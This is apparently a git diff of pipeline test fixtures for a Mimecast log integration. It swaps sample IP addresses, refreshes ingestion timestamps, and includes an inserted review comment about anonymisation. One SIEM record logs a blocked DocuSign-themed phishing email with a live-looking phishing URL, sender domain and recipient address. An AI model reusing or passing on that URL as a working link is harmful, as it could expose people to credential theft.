Download filename (HTML Report recovery id): eNqrVipOTS4tSs1MUbJSyo3RDw81rTCpynMpdiuICMopyihxynZztcisDMoN9zWLSCrPzAjz9PALNzFwySrLMNQ2yUs38g9zS860cHKNMExR0lFKLi0uyc9NLUrOT0kFGulsYuZobgoUL0pNzi9LLarULUksztYFWWdpaKqjBBQqzszPU7IyrAUAsSEteA by johndoe@example.com, Date: 2021-10-12, Time: 17:55:14+0000, IP: 67.43.156.15, Application: Administration Console\",\"category\":\"archive_service_logs\"}", "id": "eNqrVipOTS4tSs1MUbJScjMvyjIxr6yoLDY2qQopLq3yDnM1dwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiYGZorKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAE5dK-0", "created": "2021-10-12T17:55:14.000Z" }, @@ -1193,7 +878,7 @@ "mimecast": { "application": "Administration Console", "category": "archive_service_logs", - "eventInfo": "Mailbox export downloaded. Download filename (HTML Report recovery id): eNqrVipOTS4tSs1MUbJSyo3RDw81rTCpynMpdiuICMopyihxynZztcisDMoN9zWLSCrPzAjz9PALNzFwySrLMNQ2yUs38g9zS860cHKNMExR0lFKLi0uyc9NLUrOT0kFGulsYuZobgoUL0pNzi9LLarULUksztYFWWdpaKqjBBQqzszPU7IyrAUAsSEteA by johndoe@example.com, Date: 2021-10-12, Time: 17:55:14+0000, IP: 8.8.8.8, Application: Administration Console" + "eventInfo": "Mailbox export downloaded. Download filename (HTML Report recovery id): eNqrVipOTS4tSs1MUbJSyo3RDw81rTCpynMpdiuICMopyihxynZztcisDMoN9zWLSCrPzAjz9PALNzFwySrLMNQ2yUs38g9zS860cHKNMExR0lFKLi0uyc9NLUrOT0kFGulsYuZobgoUL0pNzi9LLarULUksztYFWWdpaKqjBBQqzszPU7IyrAUAsSEteA by johndoe@example.com, Date: 2021-10-12, Time: 17:55:14+0000, IP: 67.43.156.15, Application: Administration Console" } }, { 
@@ -1207,31 +892,16 @@ "johndoe@example.com" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "client": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "review-set-action", - "ingested": "2021-11-25T11:34:08.372351300Z", - "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSitH39gl1cS509PT1MSnw90l0CinPCQgLS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsYmBsYqqjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgAxASul\",\"auditType\":\"Review Set Action\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T17:07:00+0000\",\"eventInfo\":\"Viewed Review Set Details - Case: Class Action, Review Set: Contracts, Date: 2021-10-12, Time: 17:07:00+0000, IP: 8.8.8.8, Application: mimecast-case-review\",\"category\":\"case_review_logs\"}", + "ingested": "2021-12-09T15:16:03.637606400Z", + "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSitH39gl1cS509PT1MSnw90l0CinPCQgLS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsYmBsYqqjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgAxASul\",\"auditType\":\"Review Set Action\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T17:07:00+0000\",\"eventInfo\":\"Viewed Review Set Details - Case: Class Action, Review Set: Contracts, Date: 2021-10-12, Time: 17:07:00+0000, IP: 67.43.156.15, Application: mimecast-case-review\",\"category\":\"case_review_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSitH39gl1cS509PT1MSnw90l0CinPCQgLS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsYmBsYqqjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgAxASul", "created": "2021-10-12T17:07:00.000Z" }, 
@@ -1246,7 +916,7 @@
 "mimecast": {
 "application": "mimecast-case-review",
 "category": "case_review_logs",
- "eventInfo": "Viewed Review Set Details - Case: Class Action, Review Set: Contracts, Date: 2021-10-12, Time: 17:07:00+0000, IP: 8.8.8.8, Application: mimecast-case-review"
+ "eventInfo": "Viewed Review Set Details - Case: Class Action, Review Set: Contracts, Date: 2021-10-12, Time: 17:07:00+0000, IP: 67.43.156.15, Application: mimecast-case-review"
 }
 },
 {
@@ -1260,31 +930,16 @@ "johndoe@example.com" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "client": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "remediation-incident-adjustment", - "ingested": "2021-11-25T11:34:08.372352300Z", - "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJS8vDNLCt0DHEKS4xICvNJqzQ1MjOyyAlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaWJurKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAByMK38\",\"auditType\":\"Remediation Incident Adjustment\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T15:38:05+0000\",\"eventInfo\":\"Restore Remediation Incident Created - TR-C46A75-01419-R, type : restore, search criteria : {\\\"unremediateCode\\\":\\\"TR-C46A75-01419-M\\\",\\\"from\\\":\\\"gmail.com\\\",\\\"start\\\":\\\"2021-10-10T15:33:49+0000\\\",\\\"end\\\":\\\"2021-10-12T15:33:49+0000\\\"}, Date: 2021-10-12, Time: 15:38:05+0000, IP: 8.8.8.8, Application: Administration Console\",\"category\":\"account_logs\"}", + "ingested": "2021-12-09T15:16:03.637611100Z", + "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJS8vDNLCt0DHEKS4xICvNJqzQ1MjOyyAlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaWJurKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAByMK38\",\"auditType\":\"Remediation Incident Adjustment\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T15:38:05+0000\",\"eventInfo\":\"Restore Remediation Incident Created - TR-C46A75-01419-R, type : restore, search criteria : {\\\"unremediateCode\\\":\\\"TR-C46A75-01419-M\\\",\\\"from\\\":\\\"gmail.com\\\",\\\"start\\\":\\\"2021-10-10T15:33:49+0000\\\",\\\"end\\\":\\\"2021-10-12T15:33:49+0000\\\"}, Date: 2021-10-12, Time: 15:38:05+0000, IP: 67.43.156.15, Application: 
Administration Console\",\"category\":\"account_logs\"}", "id": "eNqrVipOTS4tSs1MUbJS8vDNLCt0DHEKS4xICvNJqzQ1MjOyyAlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaWJurKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAByMK38", "type": "type : restore", "created": "2021-10-12T15:38:05.000Z" @@ -1300,7 +955,7 @@ "mimecast": { "application": "Administration Console", "category": "account_logs", - "eventInfo": "Restore Remediation Incident Created - TR-C46A75-01419-R, type : restore, search criteria : {\"unremediateCode\":\"TR-C46A75-01419-M\",\"from\":\"gmail.com\",\"start\":\"2021-10-10T15:33:49+0000\",\"end\":\"2021-10-12T15:33:49+0000\"}, Date: 2021-10-12, Time: 15:38:05+0000, IP: 8.8.8.8, Application: Administration Console" + "eventInfo": "Restore Remediation Incident Created - TR-C46A75-01419-R, type : restore, search criteria : {\"unremediateCode\":\"TR-C46A75-01419-M\",\"from\":\"gmail.com\",\"start\":\"2021-10-10T15:33:49+0000\",\"end\":\"2021-10-12T15:33:49+0000\"}, Date: 2021-10-12, Time: 15:38:05+0000, IP: 67.43.156.15, Application: Administration Console" } } ] diff --git a/packages/mimecast/data_stream/dlp_logs/_dev/test/pipeline/test-dlp-logs.log-expected.json b/packages/mimecast/data_stream/dlp_logs/_dev/test/pipeline/test-dlp-logs.log-expected.json index 7bba78b2f50..478ae824720 100644 --- a/packages/mimecast/data_stream/dlp_logs/_dev/test/pipeline/test-dlp-logs.log-expected.json +++ b/packages/mimecast/data_stream/dlp_logs/_dev/test/pipeline/test-dlp-logs.log-expected.json 
@@ -10,7 +10,7 @@
 },
 "event": {
 "action": "hold",
- "ingested": "2021-11-25T11:34:10.753237800Z",
+ "ingested": "2021-12-09T15:16:05.359023300Z",
 "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Undelivered Mail Returned to Sender\",\"eventTime\":\"2021-10-15T20:41:25+0000\",\"route\":\"inbound\",\"policy\":\"Content Inspection - Watermark\",\"action\":\"hold\",\"messageId\":\"\u003c20211015204122.2CA6DFCAE2@mail.emailsec.ninja\u003e\"}",
 "created": "2021-10-15T20:41:25+0000"
 },
@@ -39,7 +39,7 @@
 },
 "event": {
 "action": "notification",
- "ingested": "2021-11-25T11:34:10.753244800Z",
+ "ingested": "2021-12-09T15:16:05.359032800Z",
 "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Undelivered Mail Returned to Sender\",\"eventTime\":\"2021-10-15T20:41:25+0000\",\"route\":\"inbound\",\"policy\":\"Content Inspection - Watermark\",\"action\":\"notification\",\"messageId\":\"\u003c20211015204122.2CA6DFCAE2@mail.emailsec.ninja\u003e\"}",
 "created": "2021-10-15T20:41:25+0000"
 },
@@ -68,7 +68,7 @@
 },
 "event": {
 "action": "hold",
- "ingested": "2021-11-25T11:34:10.753246400Z",
+ "ingested": "2021-12-09T15:16:05.359038900Z",
 "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Undelivered Mail Returned to Sender\",\"eventTime\":\"2021-10-15T20:41:22+0000\",\"route\":\"inbound\",\"policy\":\"Content Inspection - Watermark\",\"action\":\"hold\",\"messageId\":\"\u003c20211015204119.F16C2FCC60@mail.emailsec.ninja\u003e\"}",
 "created": "2021-10-15T20:41:22+0000"
 },
@@ -97,7 +97,7 @@
 },
 "event": {
 "action": "notification",
- "ingested": "2021-11-25T11:34:10.753248100Z",
+ "ingested": "2021-12-09T15:16:05.359044900Z",
 "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Undelivered Mail Returned to Sender\",\"eventTime\":\"2021-10-15T20:41:22+0000\",\"route\":\"inbound\",\"policy\":\"Content Inspection - Watermark\",\"action\":\"notification\",\"messageId\":\"\u003c20211015204119.F16C2FCC60@mail.emailsec.ninja\u003e\"}",
 "created": "2021-10-15T20:41:22+0000"
 },
@@ -126,7 +126,7 @@
 },
 "event": {
 "action": "notification",
- "ingested": "2021-11-25T11:34:10.753249600Z",
+ "ingested": "2021-12-09T15:16:05.359050800Z",
 "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Undelivered Mail Returned to Sender\",\"eventTime\":\"2021-10-15T20:41:21+0000\",\"route\":\"inbound\",\"policy\":\"Content Inspection - Watermark\",\"action\":\"notification\",\"messageId\":\"\u003c20211015204118.05EA6FCAE2@mail.emailsec.ninja\u003e\"}",
 "created": "2021-10-15T20:41:21+0000"
 },
@@ -155,7 +155,7 @@
 },
 "event": {
 "action": "hold",
- "ingested": "2021-11-25T11:34:10.753250900Z",
+ "ingested": "2021-12-09T15:16:05.359056700Z",
 "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Undelivered Mail Returned to Sender\",\"eventTime\":\"2021-10-15T20:41:21+0000\",\"route\":\"inbound\",\"policy\":\"Content Inspection - Watermark\",\"action\":\"hold\",\"messageId\":\"\u003c20211015204118.05EA6FCAE2@mail.emailsec.ninja\u003e\"}",
 "created": "2021-10-15T20:41:21+0000"
 },
@@ -184,7 +184,7 @@
 },
 "event": {
 "action": "notification",
- "ingested": "2021-11-25T11:34:10.753252100Z",
+ "ingested": "2021-12-09T15:16:05.359062400Z",
 "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Undelivered Mail Returned to Sender\",\"eventTime\":\"2021-10-15T20:41:19+0000\",\"route\":\"inbound\",\"policy\":\"Content Inspection - Watermark\",\"action\":\"notification\",\"messageId\":\"\u003c20211015204116.6A8CFFCC60@mail.emailsec.ninja\u003e\"}",
 "created": "2021-10-15T20:41:19+0000"
 },
@@ -213,7 +213,7 @@
 },
 "event": {
 "action": "hold",
- "ingested": "2021-11-25T11:34:10.753253400Z",
+ "ingested": "2021-12-09T15:16:05.359068200Z",
 "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Undelivered Mail Returned to Sender\",\"eventTime\":\"2021-10-15T20:41:19+0000\",\"route\":\"inbound\",\"policy\":\"Content Inspection - Watermark\",\"action\":\"hold\",\"messageId\":\"\u003c20211015204116.6A8CFFCC60@mail.emailsec.ninja\u003e\"}",
 "created": "2021-10-15T20:41:19+0000"
 },
@@ -242,7 +242,7 @@
 },
 "event": {
 "action": "hold",
- "ingested": "2021-11-25T11:34:10.753254700Z",
+ "ingested": "2021-12-09T15:16:05.359078400Z",
 "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Undelivered Mail Returned to Sender\",\"eventTime\":\"2021-10-15T20:41:17+0000\",\"route\":\"inbound\",\"policy\":\"Content Inspection - Watermark\",\"action\":\"hold\",\"messageId\":\"\u003c20211015204114.8AE40FCAE2@mail.emailsec.ninja\u003e\"}",
 "created": "2021-10-15T20:41:17+0000"
 },
@@ -271,7 +271,7 @@
 },
 "event": {
 "action": "notification",
- "ingested": "2021-11-25T11:34:10.753256Z",
+ "ingested": "2021-12-09T15:16:05.359084700Z",
 "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Undelivered Mail Returned to Sender\",\"eventTime\":\"2021-10-15T20:41:17+0000\",\"route\":\"inbound\",\"policy\":\"Content Inspection - Watermark\",\"action\":\"notification\",\"messageId\":\"\u003c20211015204114.8AE40FCAE2@mail.emailsec.ninja\u003e\"}",
 "created": "2021-10-15T20:41:17+0000"
 },
diff --git a/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-logs.log b/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-logs.log
index b65f8d01799..70cbfff0565 100644
--- a/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-logs.log
+++ b/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-logs.log
@@ -1,7 +1,7 @@ {"Act":"Hld","AttCnt":0,"AttNames":null,"AttSize":0,"Content-Disposition":"attachment; filename=\"process_20211018093329655.json\"","Hld":"Spm","MsgId":"\u003cINX.164dae0719be95da77068c7d264.3e915.e7719.c78c.17c926a3231ace@newsletter.77onlineshop.eu\u003e","MsgSize":157436,"Sender":"bounce_9244+cdaahhimyaaaaagaad5ekqaaaaaaaaeribenpq@newsletter.77onlineshop.eu","Subject":"Hi Sandra! Neue Styles eingetroffen! – Finde deinen Lieblings-Look!","aCode":"HhuwRf_AOcuJZINE2ZgcKw","acc":"ABC123","datetime":"2021-10-18T09:02:43+0100"} -{"acc":"ABC123","Delivered":false,"IP":"8.8.8.8","RejType":"Recipient email address is possibly incorrect","RejCode":"550","AttCnt":0,"Dir":"Inbound","ReceiptAck":null,"MsgId":null,"Subject":null,"Latency":505,"Sender":"<>","datetime":"2021-10-19T07:06:40+0100","Rcpt":"johndoe@example.com","AttSize":0,"Attempt":1,"RejInfo":"5.4.1 Recipient address rejected: Access denied. AS(201806281) [LO2GBR01FT037.eop-gbr01.prod.protection.outlook.com]","TlsVer":"TLSv1.2","Cphr":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","Snt":125,"aCode":"29be076e-44cd-354d-a7c2-083d4a312371","UseTls":"Yes","Route":"Office365","Content-Disposition":"attachment; filename=\"delivery_20211018093329655.json\""} +{"acc":"ABC123","Delivered":false,"IP":"67.43.156.15","RejType":"Recipient email address is possibly incorrect","RejCode":"550","AttCnt":0,"Dir":"Inbound","ReceiptAck":null,"MsgId":null,"Subject":null,"Latency":505,"Sender":"<>","datetime":"2021-10-19T07:06:40+0100","Rcpt":"johndoe@example.com","AttSize":0,"Attempt":1,"RejInfo":"5.4.1 Recipient address rejected: Access denied. 
AS(201806281) [LO2GBR01FT037.eop-gbr01.prod.protection.outlook.com]","TlsVer":"TLSv1.2","Cphr":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","Snt":125,"aCode":"29be076e-44cd-354d-a7c2-083d4a312371","UseTls":"Yes","Route":"Office365","Content-Disposition":"attachment; filename=\"delivery_20211018093329655.json\""} {"acc":"ABC123","Sender":"postmaster@twotoeight.com","datetime":"2021-10-19T07:04:55+0100","AttSize":0,"Content-Disposition":"attachment; filename=\"process_20211018093329655.json\"","Act":"Acc","aCode":"61dfe7da-4c6d-34e1-9667-69b04f0d564f","AttCnt":0,"AttNames":null,"MsgSize":49025,"MsgId":"<137188507-1634623494888@uk-mta-151.uk.mimecast.lan>","Subject":"You have new held messages"} -{"acc":"ABC123","Delivered":true,"IP":"8.8.8.8","AttCnt":0,"Dir":"Internal","ReceiptAck":"250 SmtpInternalThread-19194240-1634623495703@uk-mta-151.uk.mimecast.lan Received OK [61dfe7da-4c6d-34e1-9667-69b04f0d564f.uk151]","MsgId":"<137188507-1634623494888@uk-mta-151.uk.mimecast.lan>","Subject":null,"Latency":1090,"Sender":"johndoe@example.com","datetime":"2021-10-19T07:04:55+0100","Rcpt":"johndoejr@example.com","AttSize":0,"Attempt":1,"Snt":51666,"aCode":"61dfe7da-4c6d-34e1-9667-69b04f0d564f","UseTls":"No", "Content-Disposition":"attachment; filename=\"delivery_20211018093329655.json\""},{"acc":"ABC123","Delivered":false,"IP":"8.8.8.8","RejType":"Recipient email address is possibly incorrect","RejCode":"550","AttCnt":0,"Dir":"Internal","ReceiptAck":null,"MsgId":"<137188507-1634623494888@uk-mta-151.uk.mimecast.lan>","Subject":"You have new held messages","Latency":1534,"Sender":"johndoe@example.com","datetime":"2021-10-19T07:04:56+0100","Rcpt":"johndoejr@example.com","AttSize":0,"Attempt":1,"RejInfo":"5.4.1 Recipient address rejected: Access denied. 
AS(201806281) [CWLGBR01FT010.eop-gbr01.prod.protection.outlook.com]","TlsVer":"TLSv1.2","Cphr":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","Snt":147,"aCode":"61dfe7da-4c6d-34e1-9667-69b04f0d564f","UseTls":"Yes","Route":"Office365","Content-Disposition":"attachment; filename=\"delivery_20211018093329655.json\""} +{"acc":"ABC123","Delivered":true,"IP":"67.43.156.15","AttCnt":0,"Dir":"Internal","ReceiptAck":"250 SmtpInternalThread-19194240-1634623495703@uk-mta-151.uk.mimecast.lan Received OK [61dfe7da-4c6d-34e1-9667-69b04f0d564f.uk151]","MsgId":"<137188507-1634623494888@uk-mta-151.uk.mimecast.lan>","Subject":null,"Latency":1090,"Sender":"johndoe@example.com","datetime":"2021-10-19T07:04:55+0100","Rcpt":"johndoejr@example.com","AttSize":0,"Attempt":1,"Snt":51666,"aCode":"61dfe7da-4c6d-34e1-9667-69b04f0d564f","UseTls":"No", "Content-Disposition":"attachment; filename=\"delivery_20211018093329655.json\""},{"acc":"ABC123","Delivered":false,"IP":"67.43.156.15","RejType":"Recipient email address is possibly incorrect","RejCode":"550","AttCnt":0,"Dir":"Internal","ReceiptAck":null,"MsgId":"<137188507-1634623494888@uk-mta-151.uk.mimecast.lan>","Subject":"You have new held messages","Latency":1534,"Sender":"johndoe@example.com","datetime":"2021-10-19T07:04:56+0100","Rcpt":"johndoejr@example.com","AttSize":0,"Attempt":1,"RejInfo":"5.4.1 Recipient address rejected: Access denied. 
AS(201806281) [CWLGBR01FT010.eop-gbr01.prod.protection.outlook.com]","TlsVer":"TLSv1.2","Cphr":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","Snt":147,"aCode":"61dfe7da-4c6d-34e1-9667-69b04f0d564f","UseTls":"Yes","Route":"Office365","Content-Disposition":"attachment; filename=\"delivery_20211018093329655.json\""} {"acc":"C46A75","Sender":"johndoe@example.com","datetime":"2021-11-08T12:09:18+0000","Rcpt":"o365_service_account@example.com","RcptActType":"Jnl","aCode":"CYSuuaBUMjOpk3k1Xhvy_Q","Dir":"Internal","RcptHdrType":"Unknown", "Content-Disposition":"attachment; filename=\"jrnl_20211018093329655.json\""} -{"acc":"C46A75","Sender":"johndoe@example.com","datetime":"2021-11-08T12:10:19+0000","Rcpt":"johndoejr@example.com","Act":"Acc","IP":"8.8.8.8","aCode":"3dbe9918-f91f-3043-b61f-d3164badfe50","Dir":"Internal","Subject":"You have new held messages","MsgId":"<140943948-1636373419265@uk-mta-286.uk.mimecast.lan>","headerFrom":"johndoe@example.com", "Content-Disposition":"attachment; filename=\"receipt_20211018093329655.json\""} -{"acc":"C46A75","reason":"malicious","subject":"DocuSign- Contract #45576744333","msgid":null,"url":"http:\/\/docusign.swrodgods.x10.mx\/Docun\/Docu\/index2.php","datetime":"2021-11-29T15:13:58+0000","route":"inbound","sourceIp":"52.100.141.34","sender":"docusign-services@zenz.us","recipient":"aorchard@twotoeight.com","action":"Block","urlCategory":"Phishing & Fraud","credentialTheft":null,"senderDomain":"zenz.us", "Content-Disposition":"attachment; filename=\"ttp_url_20211129153015541.json\""} \ No newline at end of file +{"acc":"C46A75","Sender":"johndoe@example.com","datetime":"2021-11-08T12:10:19+0000","Rcpt":"johndoejr@example.com","Act":"Acc","IP":"81.2.69.193","aCode":"3dbe9918-f91f-3043-b61f-d3164badfe50","Dir":"Internal","Subject":"You have new held messages","MsgId":"<140943948-1636373419265@uk-mta-286.uk.mimecast.lan>","headerFrom":"johndoe@example.com", "Content-Disposition":"attachment; filename=\"receipt_20211018093329655.json\""} 
+{"acc":"C46A75","reason":"malicious","subject":"DocuSign- Contract #45576744333","msgid":null,"url":"http:\/\/docusign.swrodgods.x10.mx\/Docun\/Docu\/index2.php","datetime":"2021-11-29T15:13:58+0000","route":"inbound","sourceIp":"81.2.69.193","sender":"docusign-services@zenz.us","recipient":"aorchard@twotoeight.com","action":"Block","urlCategory":"Phishing & Fraud","credentialTheft":null,"senderDomain":"zenz.us", "Content-Disposition":"attachment; filename=\"ttp_url_20211129153015541.json\""}
diff --git a/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-logs.log-expected.json b/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-logs.log-expected.json
index 76d02755dee..3b0e08ffe44 100644
--- a/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-logs.log-expected.json
+++ b/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-logs.log-expected.json
@@ -8,7 +8,7 @@
 "event": {
 "reason": "Spm",
 "action": "Hld",
- "ingested": "2021-12-06T21:18:44.898227900Z",
+ "ingested": "2021-12-09T15:16:05.665545500Z",
 "original": "{\"Act\":\"Hld\",\"AttCnt\":0,\"AttNames\":null,\"AttSize\":0,\"Content-Disposition\":\"attachment; filename=\\\"process_20211018093329655.json\\\"\",\"Hld\":\"Spm\",\"MsgId\":\"\\u003cINX.164dae0719be95da77068c7d264.3e915.e7719.c78c.17c926a3231ace@newsletter.77onlineshop.eu\\u003e\",\"MsgSize\":157436,\"Sender\":\"bounce_9244+cdaahhimyaaaaagaad5ekqaaaaaaaaeribenpq@newsletter.77onlineshop.eu\",\"Subject\":\"Hi Sandra! Neue Styles eingetroffen! – Finde deinen Lieblings-Look!\",\"aCode\":\"HhuwRf_AOcuJZINE2ZgcKw\",\"acc\":\"ABC123\",\"datetime\":\"2021-10-18T09:02:43+0100\"}",
 "created": "2021-10-18T09:02:43+0100",
 "outcome": "unknown"
@@ -41,7 +41,7 @@
 "name": "Office365"
 },
 "source": {
- "ip": "8.8.8.8"
+ "ip": "67.43.156.15"
 },
 "error": {
 "type": "Recipient email address is possibly incorrect",
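Review bot: The rewritten `ttp_url` record on the last added line still embeds a live-looking phishing URL (`docusign.swrodgods.x10.mx`), a third-party sender domain (`zenz.us`) and a personal-looking recipient (`aorchard@twotoeight.com`), while the rest of the fixture is anonymised to `johndoe@example.com`; swapping only the public IPs leaves that inconsistency and keeps what may be real indicators in the repository. Consider reserved RFC 2606 names for the non-IP fields as well, e.g. `"url":"http:\/\/docusign.phishing.example\/Docun\/Docu\/index2.php"`, `"sender":"docusign-services@sender.example"`, `"recipient":"johndoe@example.com"` and `"senderDomain":"sender.example"`; the context lines carrying `postmaster@twotoeight.com` and `newsletter.77onlineshop.eu` would presumably merit the same treatment. Any such change also requires regenerating `source.domain` and `event.original` in the matching `-expected.json`.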
@@ -61,8 +61,8 @@
 },
 "event": {
 "reason": "5.4.1 Recipient address rejected: Access denied. AS(201806281) [LO2GBR01FT037.eop-gbr01.prod.protection.outlook.com]",
- "ingested": "2021-12-06T21:18:44.898231300Z",
- "original": "{\"acc\":\"ABC123\",\"Delivered\":false,\"IP\":\"8.8.8.8\",\"RejType\":\"Recipient email address is possibly incorrect\",\"RejCode\":\"550\",\"AttCnt\":0,\"Dir\":\"Inbound\",\"ReceiptAck\":null,\"MsgId\":null,\"Subject\":null,\"Latency\":505,\"Sender\":\"\u003c\u003e\",\"datetime\":\"2021-10-19T07:06:40+0100\",\"Rcpt\":\"johndoe@example.com\",\"AttSize\":0,\"Attempt\":1,\"RejInfo\":\"5.4.1 Recipient address rejected: Access denied. AS(201806281) [LO2GBR01FT037.eop-gbr01.prod.protection.outlook.com]\",\"TlsVer\":\"TLSv1.2\",\"Cphr\":\"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384\",\"Snt\":125,\"aCode\":\"29be076e-44cd-354d-a7c2-083d4a312371\",\"UseTls\":\"Yes\",\"Route\":\"Office365\",\"Content-Disposition\":\"attachment; filename=\\\"delivery_20211018093329655.json\\\"\"}",
+ "ingested": "2021-12-09T15:16:05.665550Z",
+ "original": "{\"acc\":\"ABC123\",\"Delivered\":false,\"IP\":\"67.43.156.15\",\"RejType\":\"Recipient email address is possibly incorrect\",\"RejCode\":\"550\",\"AttCnt\":0,\"Dir\":\"Inbound\",\"ReceiptAck\":null,\"MsgId\":null,\"Subject\":null,\"Latency\":505,\"Sender\":\"\u003c\u003e\",\"datetime\":\"2021-10-19T07:06:40+0100\",\"Rcpt\":\"johndoe@example.com\",\"AttSize\":0,\"Attempt\":1,\"RejInfo\":\"5.4.1 Recipient address rejected: Access denied. AS(201806281) [LO2GBR01FT037.eop-gbr01.prod.protection.outlook.com]\",\"TlsVer\":\"TLSv1.2\",\"Cphr\":\"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384\",\"Snt\":125,\"aCode\":\"29be076e-44cd-354d-a7c2-083d4a312371\",\"UseTls\":\"Yes\",\"Route\":\"Office365\",\"Content-Disposition\":\"attachment; filename=\\\"delivery_20211018093329655.json\\\"\"}",
 "created": "2021-10-19T07:06:40+0100",
 "outcome": "failure"
 },
@@ -97,7 +97,7 @@
 },
 "event": {
 "action": "Acc",
- "ingested": "2021-12-06T21:18:44.898232900Z",
+ "ingested": "2021-12-09T15:16:05.665553900Z",
 "original": "{\"acc\":\"ABC123\",\"Sender\":\"postmaster@twotoeight.com\",\"datetime\":\"2021-10-19T07:04:55+0100\",\"AttSize\":0,\"Content-Disposition\":\"attachment; filename=\\\"process_20211018093329655.json\\\"\",\"Act\":\"Acc\",\"aCode\":\"61dfe7da-4c6d-34e1-9667-69b04f0d564f\",\"AttCnt\":0,\"AttNames\":null,\"MsgSize\":49025,\"MsgId\":\"\u003c137188507-1634623494888@uk-mta-151.uk.mimecast.lan\u003e\",\"Subject\":\"You have new held messages\"}",
 "created": "2021-10-19T07:04:55+0100",
 "outcome": "unknown"
